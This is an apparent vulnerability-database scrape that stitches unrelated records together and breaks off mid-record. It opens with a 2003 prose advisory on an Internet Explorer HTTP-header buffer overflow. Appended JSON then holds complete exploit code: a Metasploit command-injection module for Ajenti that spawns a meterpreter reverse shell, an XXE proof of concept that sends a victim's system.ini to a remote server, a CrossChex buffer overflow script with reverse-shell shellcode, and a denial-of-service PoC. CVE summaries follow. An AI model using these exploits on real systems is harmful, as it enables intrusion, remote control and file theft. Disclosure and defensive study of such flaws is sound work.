Buffer overflow in Internet Explorer's HTTP parsing code
2003-04-28T00:00:00
ID SECURITYVULNS:DOC:4457 Type securityvulns Reporter Securityvulns Modified 2003-04-28T00:00:00
Description
OVERVIEW
The code used in Microsoft Internet Explorer to parse web servers' HTTP
replies contains a buffer overflow vulnerability. Specifically the faulty
code is located in URLMON.DLL. A malicious user may exploit this
vulnerability to execute arbitrary code on an IE user's system.
DETAILS
HTTP is the protocol used in communication between web servers and web
browsers. When a web page is viewed, the browser sends a HTTP request to
the server in question. The server then sends a HTTP reply which usually
contains the web page the browser requested. In addition to the
document body which is shown to the user, the HTTP reply contains some
header fields which e.g. specify how the document should be presented to
the user.
Due to missing or insufficient input validation, a buffer overflow
takes place in Internet Explorer when it receives a HTTP reply
with excessively long values in certain header fields. A buffer placed
on stack gets overrun and a malicious reply may overwrite data,
including the subroutine's return address, and thus direct the program
execution to an arbitrary address. The vulnerability is a traditional
stack-based buffer overflow and relatively easy to exploit.
This vulnerability can be used by an attacker to run any code in the
system of the victim viewing a special web page with Internet Explorer or
reading mail with Outlook or Outlook Express. More details will be
published later.
SOLUTION
The vendor was informed about the bug on March 16, 2003. Microsoft has
classified this vulnerability as critical and published a bulletin
and patch correcting the issue. These are available at
The information in the "Mitigating factors" section of Microsoft's
bulletin claiming that this vulnerability isn't exploitable by e-mail
borne attacks is incorrect. Test exploits have been produced for
WWW, Outlook, and Outlook Express attack scenarios. In each of the
cases, the exploit code runs without further user interaction on the
victim system. Furthermore, no e-mail attachments or any kind of
scripting are needed since the attack can be carried out via a standard
HTML. In fact merely starting the e-mail program can lead to exploitation
because (depending on configuration) it may automatically open the first
new message.
CREDITS
The vulnerability was discovered by Jouko Pynnönen of Oy Online Solutions
Ltd, Finland. It was demonstrated on 25th April at Kontakti.net's
"Tekninen Tietoturva" seminar in Helsinki.
--
Jouko Pynnonen Online Solutions Ltd Secure your Linux -
jouko@solutions.fi http://www.solutions.fi http://www.secmod.com
{"id": "SECURITYVULNS:DOC:4457", "bulletinFamily": "software", "title": "Buffer overflow in Internet Explorer's HTTP parsing code", "description": "\r\n\r\n\r\nOVERVIEW\r\n========\r\n\r\nThe code used in Microsoft Internet Explorer to parse web servers' HTTP \r\nreplies contains a buffer overflow vulnerability. Specifically the faulty \r\ncode is located in URLMON.DLL. A malicious user may exploit this \r\nvulnerability to execute arbitrary code on an IE user's system.\r\n\r\n\r\n\r\nDETAILS\r\n=======\r\n\r\nHTTP is the protocol used in communication between web servers and web \r\nbrowsers. When a web page is viewed, the browser sends a HTTP request to \r\nthe server in question. The server then sends a HTTP reply which usually \r\ncontains the web page the browser requested. In addition to the \r\ndocument body which is shown to the user, the HTTP reply contains some \r\nheader fields which e.g. specify how the document should be presented to \r\nthe user.\r\n\r\nDue to missing or insufficient input validation, a buffer overflow \r\ntakes place in Internet Explorer when it receives a HTTP reply \r\nwith excessively long values in certain header fields. A buffer placed \r\non stack gets overrun and a malicious reply may overwrite data, \r\nincluding the subroutine's return address, and thus direct the program \r\nexecution to an arbitrary address. The vulnerability is a traditional \r\nstack-based buffer overflow and relatively easy to exploit.\r\n\r\nThis vulnerability can be used by an attacker to run any code in the \r\nsystem of the victim viewing a special web page with Internet Explorer or \r\nreading mail with Outlook or Outlook Express. More details will be \r\npublished later.\r\n\r\n\r\n\r\nSOLUTION\r\n========\r\n\r\nThe vendor was informed about the bug on March 16, 2003. Microsoft has \r\nclassified this vulnerability as critical and published a bulletin \r\nand patch correcting the issue. These are available at\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS03-015.asp\r\n\r\nThe information in the "Mitigating factors" section of Microsoft's \r\nbulletin claiming that this vulnerability isn't exploitable by e-mail \r\nborne attacks is incorrect. Test exploits have been produced for \r\nWWW, Outlook, and Outlook Express attack scenarios. In each of the \r\ncases, the exploit code runs without further user interaction on the \r\nvictim system. Furthermore, no e-mail attachments or any kind of \r\nscripting are needed since the attack can be carried out via a standard \r\nHTML. In fact merely starting the e-mail program can lead to exploitation \r\nbecause (depending on configuration) it may automatically open the first \r\nnew message.\r\n\r\n\r\n\r\nCREDITS\r\n=======\r\n\r\nThe vulnerability was discovered by Jouko Pynnönen of Oy Online Solutions \r\nLtd, Finland. It was demonstrated on 25th April at Kontakti.net's \r\n"Tekninen Tietoturva" seminar in Helsinki.\r\n\r\n\r\n\r\n-- \r\nJouko Pynnonen Online Solutions Ltd Secure your Linux -\r\njouko@solutions.fi http://www.solutions.fi http://www.secmod.com\r\n\r\n", "published": "2003-04-28T00:00:00", "modified": "2003-04-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4457", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:07", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "81f77f8cdcfa8fb528e284e88acbed6c"}, {"key": "href", "hash": "a8fc42682965be89350bb8e71db4f587"}, {"key": "modified", "hash": "2657a6ec7a1b66c3250220aadfb7d525"}, {"key": "published", "hash": "2657a6ec7a1b66c3250220aadfb7d525"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "4fde8a9b0fa81281f44d07dc3e2f08c1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "1adcae3bf7bd018d17f555eaf13d99e57372f11035b748d9401d15f63e02ec07", "viewCount": 2, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:07"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704457", "OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527", "OPENVAS:1361412562310844027", "OPENVAS:1361412562310852520"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1528-1", "OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1431-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4457-1:F2BE2"]}, {"type": "ubuntu", "idList": ["USN-3998-1", "USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32775", "1337DAY-ID-32772", "1337DAY-ID-32771", "1337DAY-ID-32767"]}], "modified": "2018-08-31T11:10:07"}, "vulnersScore": 2.9}, "objectVersion": "1.3", "affectedSoftware": []}
{"zdt": [{"lastseen": "2019-12-04T16:04:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.", "modified": "2019-12-03T00:00:00", "published": "2019-12-03T00:00:00", "id": "1337DAY-ID-33620", "href": "https://0day.today/exploit/description/33620", "title": "Ajenti 2.1.31 Command Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ajenti auth username Command Injection',\r\n 'Description' => %q{\r\n This module exploits a command injection in Ajenti == 2.1.31.\r\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.\r\n },\r\n 'Author' => [\r\n 'Jeremy Brown', # Vulnerability discovery\r\n 'Onur ER <[email\u00a0protected]>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['EDB', '47497']\r\n ],\r\n 'DisclosureDate' => '2019-10-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON,\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Ajenti == 2.1.31', {}]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8000,\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0\r\n ))\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => '/view/login/normal'\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.body =~ /ajenti/i\r\n return CheckCode::Safe\r\n end\r\n\r\n version = res.body.scan(/'ajentiVersion', '([\\d\\.]+)'/).flatten.first\r\n\r\n if version\r\n vprint_status \"Ajenti version #{version}\"\r\n end\r\n\r\n if version == '2.1.31'\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n print_status('Exploiting...')\r\n json_body = { 'username' => \"`python -c \\\"#{payload.encoded}\\\"`\",\r\n 'password' => rand_text_alpha_lower(7),\r\n 'mode' => 'normal'\r\n }\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),\r\n 'ctype' => 'application/json',\r\n 'data' => JSON.generate(json_body)\r\n })\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33620"}, {"lastseen": "2019-12-04T14:10:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33612", "href": "https://0day.today/exploit/description/33612", "title": "Visual Studio 2008 - XML External Entity Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Visual Studio 2008 - XML External Entity Injection\r\n# Discovery by: hyp3rlinx\r\n# Date: 2019-12-02\r\n# Vendor Homepage: www.microsoft.com\r\n# Software Link: Visual Studio 2008 Express IDE \r\n# Tested Version: 2008\r\n# CVE: N/A\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nVisual Studio 2008 Express IDE \r\nvcsetup.exe\r\nFile hash: 62f764849e8fcdf8bfbc342685641304\r\nDownload: http://go.microsoft.com/?linkid=7729279\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection 0Day\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nVisual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.\r\nBy opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the\r\nremote attackers server. \r\n\r\nDouble click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get \r\nassociated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.\r\n\r\n[Vuln XXE file types]\r\n.snippet\r\n.i\r\n.s\r\n.asm\r\n.disco\r\n.lst\r\n.inc\r\n.srf\r\n.wsdl\r\n.rgs\r\n.xml\r\n\r\nThis IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.\r\n\r\n\r\n[References]\r\nhttps://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/\r\n\r\n\r\n[Exploit/POC]\r\n\"Evil.snippet\" or any of the extensions mentioned above.\r\n\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE knobgobslob [ \r\n<!ENTITY % file SYSTEM \"C:\\Windows\\system.ini\">\r\n<!ENTITY % dtd SYSTEM \"http://127.0.0.1:8000/payload.dtd\">\r\n%dtd;]>\r\n<pwn>&send;</pwn>\r\n\r\n\r\n\"payload.dtd\"\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>\">\r\n%all;\r\n\r\n\r\npython -m SimpleHTTPServer\r\npython -m http.server (Python3)\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=QOZlwzsbPrk\r\n\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33612"}, {"lastseen": "2019-12-04T02:04:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33614", "href": "https://0day.today/exploit/description/33614", "title": "Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow\r\n# Exploit Author: Luis Catarino & Pedro Rodrigues\r\n# Vendor Homepage: https://www.anviz.com/\r\n# Software Link: https://www.anviz.com/download.html\r\n# Version: Crosschex Standard x86 <= V4.3.12\r\n# Tested on: 4.3.8.0, 4.3.12\r\n# CVE : N/A\r\n# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html\r\n\r\nimport socket\r\nimport time\r\nimport sys\r\nimport binascii\r\n\r\n# Scapy for the broadcast packet with custom sport\r\nfrom scapy.all import Raw,IP,Dot1Q,UDP,Ether\r\nimport scapy.all\r\n\r\n# shellcode working calc.exe\r\ncalculator_payload = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\ncalculator_payload += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\ncalculator_payload += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\ncalculator_payload += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\ncalculator_payload += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\ncalculator_payload += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\ncalculator_payload += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\ncalculator_payload += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\ncalculator_payload += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\ncalculator_payload += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\ncalculator_payload += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\ncalculator_payload += b\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\ncalculator_payload += b\"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\ncalculator_payload += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\ncalculator_payload += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n# shellcode windows x86 reverse_shell\r\nshell_payload_1 = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nshell_payload_1 += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell_payload_1 += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell_payload_1 += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell_payload_1 += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell_payload_1 += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell_payload_1 += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell_payload_1 += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell_payload_1 += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell_payload_1 += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell_payload_1 += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell_payload_1 += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell_payload_1 += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell_payload_1 += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\nshell_payload_1 += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\"\r\n\r\n# shellcode windows x86 reverse_shell (part_2)\r\nshell_payload_2 = b\"\\x68\\x02\\x00\\x01\\xbd\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell_payload_2 += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\nshell_payload_2 += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\nshell_payload_2 += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\nshell_payload_2 += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\nshell_payload_2 += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\nshell_payload_2 += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\nshell_payload_2 += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\nshell_payload_2 += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nshell_payload_2 += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\ndef ipToShellcode(ip):\r\n a = ip.split('.')\r\n b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))\r\n b = b.replace(\"0x\",\"\")\r\n return binascii.unhexlify(b)\r\n\r\n# sport has to be 5060\r\ndef sendFuzzingUDPBroadcast(ip=\"255.255.255.255\", sport=5050, dport=5060):\r\n request = b\"A\"*77 # Original payload substitute\r\n request += b\"B\"*184\r\n request += b\"\\x07\\x18\\x42\\x00\" # EIP - 00421807 crosscheck_standard.exe\r\n request += b\"A\"*4\r\n # 269 bytes\r\n\r\n if len(sys.argv) > 2:\r\n request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2\r\n else:\r\n request = request + calculator_payload\r\n\r\n scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )\r\n\r\ndef setFuzzUDPServer(ip='', port=5050, timeout=150):\r\n try :\r\n \ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n except:\r\n \tprint('[!] Failed to create server socket')\r\n\r\n try:\r\n \ts.bind(('', port))\r\n except:\r\n \tprint('[*] Server socket bind failed')\r\n \tsys.exit()\r\n\r\n print('[*] Waiting for crosschex')\r\n s.settimeout(timeout)\r\n timeout = time.time() + timeout\r\n responses = []\r\n\r\n while True:\r\n if time.time() > timeout:\r\n break\r\n try:\r\n response = s.recvfrom(1024)\r\n print(response)\r\n responses.append(response)\r\n sendFuzzingUDPBroadcast(ip=ip)\r\n response = s.recvfrom(1024) \r\n except socket.timeout:\r\n print(\"[!] Error with UDP server\")\r\n\r\n s.close()\r\n return responses\r\n\r\nnargs = len(sys.argv)\r\n\r\nif nargs < 2:\r\n print(\"[*] Usage: python3 %s <network_interface> [<ip>]\\n\\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445\")\r\n sys.exit(0)\r\n\r\nsetFuzzUDPServer()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33614"}, {"lastseen": "2019-12-04T01:58:54", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-27T00:00:00", "published": "2019-11-27T00:00:00", "id": "1337DAY-ID-33593", "href": "https://0day.today/exploit/description/33593", "title": "InduSoft Web Studio 8.1 SP1 - (Atributos) Denial of Service Exploit", "type": "zdt", "sourceData": "# Exploit Title: InduSoft Web Studio 8.1 SP1 - \"Atributos\" Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Exploit Title: InduSoft Web Studio 8.1 SP1 - \"Atributos\" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Google Dork: [email\u00a0protected]: chuyreds\r\n# Discovery Date: 23-11-2019\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Steps to Produce the Denial of Service: \r\n# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py\r\n# 2.- Open InduSoft \"Web Studio Edition 8.1 SP1.txt\" and copy content to clipboard\r\n# 3.- Open InduSoft Web Studio Edition 8.1 SP1\r\n# 4.- On Graficos slect Atributos\r\n# 5.- Paste ClipBoard on \"No Redibujar\"/\"Deshabilitados\" and click on \"Aceptar\"\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\nbuffer = \"\\x41\" * 1026\r\nf = open (\"InduSoft Web Studio Edition 8.1 SP1.txt\", \"w\")\r\nf.write(buffer)\r\nf.close()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33593"}], "cve": [{"lastseen": "2019-12-03T17:07:13", "bulletinFamily": "NVD", "description": "FreeBSD: Input Validation Flaw allows local users to gain elevated privileges", "modified": "2019-12-02T18:38:00", "id": "CVE-2012-4576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4576", "published": "2019-12-02T18:15:00", "title": "CVE-2012-4576", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:04:16", "bulletinFamily": "NVD", "description": "Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.", "modified": "2019-12-02T18:38:00", "id": "CVE-2014-9356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356", "published": "2019-12-02T18:15:00", "title": "CVE-2014-9356", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:34", "bulletinFamily": "NVD", "description": "The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a \"Last-Level Cache Side-Channel Attack.\"", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-0837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0837", "published": "2019-11-29T22:15:00", "title": "CVE-2015-0837", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:04:10", "bulletinFamily": "NVD", "description": "Libgcrypt before 1.6.3 and GnuPG before 1.4.19 does not implement ciphertext blinding for Elgamal decryption, which allows physically proximate attackers to obtain the server's private key by determining factors using crafted ciphertext and the fluctuations in the electromagnetic field during multiplication.", "modified": "2019-12-02T13:37:00", "published": "2019-11-29T22:15:00", "id": "CVE-2014-3591", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3591", "title": "CVE-2014-3591", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:36", "bulletinFamily": "NVD", "description": "cabextract before 1.6 does not properly check for leading slashes when extracting files, which allows remote attackers to conduct absolute directory traversal attacks via a malformed UTF-8 character that is changed to a UTF-8 encoded slash.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-2060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2060", "published": "2019-11-29T21:15:00", "title": "CVE-2015-2060", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:37", "bulletinFamily": "NVD", "description": "The PGP signature parsing in Module::Signature before 0.74 allows remote attackers to cause the unsigned portion of a SIGNATURE file to be treated as the signed portion via unspecified vectors.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-3406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3406", "published": "2019-11-29T21:15:00", "title": "CVE-2015-3406", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:35", "bulletinFamily": "NVD", "description": "verify_certificate_identity in the OpenSSL extension in Ruby before 2.0.0 patchlevel 645, 2.1.x before 2.1.6, and 2.2.x before 2.2.2 does not properly validate hostnames, which allows remote attackers to spoof servers via vectors related to (1) multiple wildcards, (1) wildcards in IDNA names, (3) case sensitivity, and (4) non-ASCII characters.", "modified": "2019-12-02T13:37:00", "published": "2019-11-29T21:15:00", "id": "CVE-2015-1855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1855", "title": "CVE-2015-1855", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:04:10", "bulletinFamily": "NVD", "description": "The addto parameter to fup in Frams' Fast File EXchange (F*EX, aka fex) before fex-2014053 allows remote attackers to conduct cross-site scripting (XSS) attacks", "modified": "2019-11-29T12:24:00", "id": "CVE-2014-3875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3875", "published": "2019-11-27T19:15:00", "title": "CVE-2014-3875", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:38", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Cloudera Manager UI before 5.4.3 allow remote authenticated users to inject arbitrary web script or HTML using unspecified vectors.", "modified": "2019-12-02T19:57:00", "id": "CVE-2015-4457", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4457", "published": "2019-11-26T15:15:00", "title": "CVE-2015-4457", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-11-26T12:31:59", "bulletinFamily": "NVD", "description": "A Directory Traversal vulnerability exists in the GNU patch before 2.7.4. A remote attacker can write to arbitrary files via a symlink attack in a patch file. NOTE: this issue exists because of an incomplete fix for CVE-2015-1196.", "modified": "2019-11-25T17:35:00", "id": "CVE-2015-1396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1396", "published": "2019-11-25T16:15:00", "title": "CVE-2015-1396", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-12-04T15:52:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-11-30T00:00:00", "published": "2019-11-30T00:00:00", "id": "OPENVAS:1361412562310892014", 